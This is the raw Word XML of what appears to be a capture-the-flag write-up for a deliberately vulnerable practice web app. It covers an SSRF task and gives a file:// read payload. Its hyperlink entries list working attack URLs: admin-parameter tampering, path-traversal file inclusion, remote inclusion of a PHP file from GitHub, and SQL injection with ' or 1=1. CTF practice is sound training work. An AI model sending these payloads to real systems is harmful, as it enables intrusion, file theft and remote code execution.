          <w:t xml:space="preserve">http://fintech-vuln.l0r.ru/admin.php?login_data=[admin,0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">] or whatever</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2298700"/>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hd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="80" w:before="0" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="705" w:firstLine="15"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212529"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vvuozvsr7ypj" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>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color w:val="b7b7b7"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pdh4r9rvk8y8" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF: D Grade   </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="b7b7b7"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aka 0’s is fun</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yltrp4kp88yj" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag Location:  be admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212529"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212529"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212529"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5500688" cy="1948160"/>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500688" cy="19481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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Если коротко, то: file:////var/www/html/ssrf.php :)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId33" w:type="first"/>
      <w:headerReference r:id="rId34" w:type="default"/>
      <w:footerReference r:id="rId35" w:type="first"/>
      <w:footerReference r:id="rId36"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11" name="image21.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="footer graphic" id="0" name="image2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3" name="image21.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="footer graphic" id="0" name="image2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12" name="image16.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="corner graphic" id="0" name="image16.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5" name="image19.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="corner graphic" id="0" name="image19.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intech-vuln.l0r.ru/lfi.php?page=../../../../../var/www/html/flag" TargetMode="External"/><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fintech-vuln.l0r.ru/admin.php?login_data=%5Btrue,true" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fintech-vuln.l0r.ru/admin.php?login_data=%5Badmin,0" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fintech-vuln.l0r.ru/rfi.php?page=https://raw.githubusercontent.com/s-yakubovskiy/init/master/header.inc.php.txt" TargetMode="External"/><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8.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fintech-vuln.l0r.ru/sql-inj.php?login=admin&amp;password=lol%27%20or%201=1%20--%201%%27" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fintech-vuln.l0r.ru/sql-inj.php?login=admin&amp;password=lol" TargetMode="External"/><Relationship Id="rId34"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image" Target="media/image22.png"/><Relationship Id="rId36"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